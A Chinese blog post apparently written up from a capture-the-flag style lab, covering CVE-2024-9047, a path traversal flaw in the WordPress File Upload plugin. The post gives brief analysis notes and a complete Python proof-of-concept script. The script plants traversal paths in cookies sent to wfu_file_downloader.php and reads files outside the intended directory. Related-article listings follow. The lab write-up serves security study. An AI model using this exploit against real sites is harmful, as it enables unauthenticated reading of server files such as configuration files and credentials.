【春秋云镜】CVE-2024-9047 Wordpress File Upload 插件 文件遍历漏洞

原创 已于 2025-10-22 10:07:08 修改 · 448 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全漏洞

于 2025-10-14 15:45:00 首次发布
该文章已生成可运行项目,

一、靶场介绍

WordPress 的 File Upload 插件在所有版本(包括 4.24.11)中都存在路径遍历漏洞,漏洞位于 wfu_file_downloader.php 文件中。这使得未经身份验证的攻击者可以读取或删除超出原定目录之外的文件。

在这里插入图片描述

漏洞分析

调用函数 wfu_fopen_for_downloader
在这里插入图片描述
这里调用了wfu_fopen_for_downloader
在这里插入图片描述

这两个地方也调用了
在这里插入图片描述

寻找参数的传入位置

在这里插入图片描述

二、POC

import requests
import time
import argparse

def exploit(target_url):
    timestamp = str(int(time.time()))
    path = "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"
    query_params = {
        'file': 'yosheep',
        'handler': 'dboption',
        'session_legacy': '1',
        'dboption_base': 'cookies',
        'dboption_useold': '1',
        'wfu_cookie': '1',
        'ticket': 'yosheep'
    }
    
    cookies = {
        f'wfu_storage_yosheep': '/../../../../../../flag',
        f'wfu_download_ticket_yosheep': timestamp,
        'wfu_ABSPATH': '/var/www/html/'
    }
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
    }

    try:
        response = requests.get(
            f"{target_url.rstrip('/')}{path}",
            params=query_params,
            cookies=cookies,
            headers=headers,
            timeout=10
        )
        response.raise_for_status()
        return response.text
    except requests.exceptions.RequestException as e:
        return f"请求失败: {str(e)}"
def main():
    parser = argparse.ArgumentParser(description='CVE-2024-9047漏洞利用工具')
    parser.add_argument('url', help='目标URL(包含协议,如http://example.com)')
    args = parser.parse_args()
    
    result = exploit(args.url)
    print(f"结果返回:\n{result}")

if __name__ == '__main__':
    main()

获取flag
在这里插入图片描述

最后也没看明白为什么传入地方时cookie,可能是在函数处理时对cookie的值进行引入了。
感兴趣的可以看这个位博主的文章:

(CVE-2024-9047)wordpress插件wp-file-upload任意文件读取分析及复现(含payload)

本文章已经生成可运行项目
WordPress File Upload 插件 任意文件读取漏洞复现(CVE-2024-9047)
0xSec
12-24 1537
WordPress File Upload 插件,在小于或等于4.24.11版本前的 wfu_file_downloader.php 文件存在前台任意文件读取+任意文件删除漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
WordPress File Upload插件 任意文件读取漏洞复现(CVE-2024-9047)(附脚本)
iSee857的博客
12-25 1638
WordPresFile Upload插件中存在任意文件读取漏洞,主要是位于 /wp-content/plugins/wp-file-upload/wfu_file_downloader.php 中的wfu_fopen_for_downloader 方法使用fopen 函数导致文件读取操作。
CVE-2024-9047复现
songmoshangchen的博客
01-06 2405
这使得未经身份验证的攻击者能够读取或删除原始意图目录之外的文件。成功利用此漏洞要求目标WordPress安装使用PHP 7.4或更早版本。插件存在路径遍历漏洞,该漏洞影响所有版本至包括(含)4.24.11版本,漏洞位于。以下代码是是4.24.11版本WordPress File Upload。既然是路径遍历漏洞,先定位一下。WordPress的。
CVE-2024-9047 WordPress File Upload路径遍历漏洞分析
qq_42735101的博客
01-20 1310
本文主要是对CVE-2024-9047WordPressFileUpload路径遍历漏洞进行分析,包括漏洞分析、代码详细说明、漏洞利用实践。CVE-2024-9047是一个存在于WordPress插件FileUpload<=4.24.11版本中的路径遍历漏洞。该插件目前已经更新到4.25.1版本,适合WordPress2.9.2及更高版本。文章提供概念验证代码,并建议读者遵循合法途径学习和使用相关知识。
Goby 漏洞发布|CVE-2024-9047 WordPress File Upload 插件 wfu_file_downloader.php 任意文件读取漏洞
m0_46699477的博客
12-25 886
WordPress File Upload插件是一款WordPress网站的实用插件,它允许用户地将文件上传到wp-contents目录, 插件支持自定义字段,同时,它还提供了进度条监视功能,让用户可以实时了解上传进度。WordPress File Upload 插件在 <= 4.24.11 版本中,wfu_file_downloader.php 文件存在任意文件读取漏洞。攻击者可以通过构造恶意请求读取服务器上的任意文件,可能导致敏感信息泄露或进一步的攻击。
CVE-2024-9047wordpress插件wp-file-upload任意文件读取分析及复现(含payload)
qq_53099119的博客
12-27 2120
如果全局变量 $wfu_user_state_handler 等于 “dboption”,且 WFU_VAR(“WFU_US_DBOPTION_BASE”) == “cookies”,则直接从 $_COOKIE 数组中返回变量 $var 的值。此处省略了一些,比如wfu_ABSPATH需要包含wp-load.php文件,而该文件在根目录下,由于仅为需要满足的步骤,此处不多赘述。在构造payload的时候,需要绕过以上限制,基本就是有一些键值不能为空的情况,这几个值都在前面有获取,通过GET或POST方法。
春秋cve-2024-9047
12-21
CVE-2024-904 是一个影响 WordPress 插件文件上传漏洞,具体涉及 `wp-file-upload` 插件。在春秋境的靶标环境中,该漏洞允许攻击者通过路径遍历(Path Traversal)读取敏感文件(如 `flag` 文件),从而绕过安全...
cve-2024-9047
06-14
CVE-2024-9047 是针对 WordPress File Upload 插件的一个严重安全漏洞,主要影响版本号小于等于 4.24.11 的插件。此漏洞允许未经身份验证的攻击者通过特定参数实现路径遍历和任意文件读取操作[^1]。 #### 脆弱点...
漏洞复现-乱复一通
2303_81631620的博客
10-30 1497
本文总结了多个常见漏洞的复现过程,包括WordPress路径遍历(CVE-2024-9047)、Tomcat WebSocket DoS(CVE-2020-13935)、Apache OFBiz多个RCE漏洞(CVE-2024-36104等)、Spring Gateway RCE(CVE-2022-22947)等。详细记录了漏洞环境搭建、POC构造和利用方法,重点分析了漏洞触发点和绕过防御的关键技术,如路径穿越、特殊字符编码等。每个漏洞都包含具体的HTTP请求示例和测试步骤,并针对不同靶场环境(如春秋)
春秋CVE-2024-904
weixin_45718655的博客
06-18 263
小白攻克CVE-2024-904靶场记录。
hvv在即,我们整理了 2024 年部分勒索漏洞清单
FreeBuf_的博客
05-08 2297
可通过官方补丁更新解决该威胁,免费更新链接:https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?威胁者可向用户发送恶意文件并诱导用户打开文件来利用该漏洞,成功利用可能导致绕过 SmartScreen安全功能。
春秋-RCE靶场漏洞复现
qq_52579508的博客
09-02 4187
CVE-2023-26469image.png靶标介绍:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。第一步获取COOKIE:第二部构造POCPOST/session/loginHTTP/1.1...
春秋境系列靶场记录(合集)-不再更新
一只爱吃橙子的羊
11-29 9417
春秋境系列靶场记录合集,不更新了哈……
WordPress ProfilePress插件多个严重漏洞
m0_61043185的博客
04-12 947
在用户画像更新过程中,拥有账户的攻击者可按照设置为管理员的数组参数提供用户元数据,从而提升权限至管理员。该漏洞存在于Image Uploader组件中,攻击者可上传伪装为图像的任意文件,包含PHP文件,从而实现远程代码执行及站点完全接管。该漏洞存在于File Uploader组件中,如果管理员没有配置文件上传设置,攻击者可在用户注册或画像更新过程中上传任意文件,从而实现远程代码执行及站点接管。严重:9.8厂商已发布升级修复漏洞,用户请尽快更新至安全版本。
PLECS损耗计算-基于LCC谐振变换器的DCDC双机并联电源开环热仿真
01-06
PLECS损耗计算-基于LCC谐振变换器的DCDC双机并联电源开环热仿真内容概要:本文档主要围绕基于LCC谐振变换器的DCDC双机并联电源系统,利用PLECS软件开展开环热仿真与损耗计算的研究。通过建立系统的仿真模型,重点分析变换器在运行过程中的功率损耗分布及热特性,帮助优化电源设计中的散热管理与效率提升。文档还提及相关电力电子系统建模、热仿真方法的应用背景,强调了在高功率密度电源设计中损耗精确计算的重要性。; 适合人群:具备电力电子、电源系统设计或仿真基础,从事相关领域研究的研发人员、工程技术人员及高校研究生。; 使用场景及目标:①掌握LCC谐振变换器的工作原理及其在双机并联结构中的应用;②学习使用PLECS进行电源系统的损耗建模与热仿真分析;③优化DCDC电源的热设计与效率性能。; 阅读建议:建议读者结合PLECS仿真工具实际操作,深入理解文档中的模型搭建、参数设置与仿真流程,并关注损耗计算与热分析的关键步骤,以实现对电源系统性能的全面评估与优化。
Web开发:一图简述OAuth 2.0授权流程中的一些关键步骤
最新发布
01-06
Web开发:一图简述OAuth 2.0授权流程中的一些关键步骤
GeneratedClass1151.java
01-06
GeneratedClass1151.java
春秋cve-2024
01-11
### 关于春秋 CVE-2024 安全漏洞修复方案 针对春秋中涉及的CVE-2024系列安全漏洞,特别是CVE-2024-23897这一严重漏洞,提供了详细的修复建议和技术措施。 #### 1. 更新软件版本 确保使用的Jenkins及其插件...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值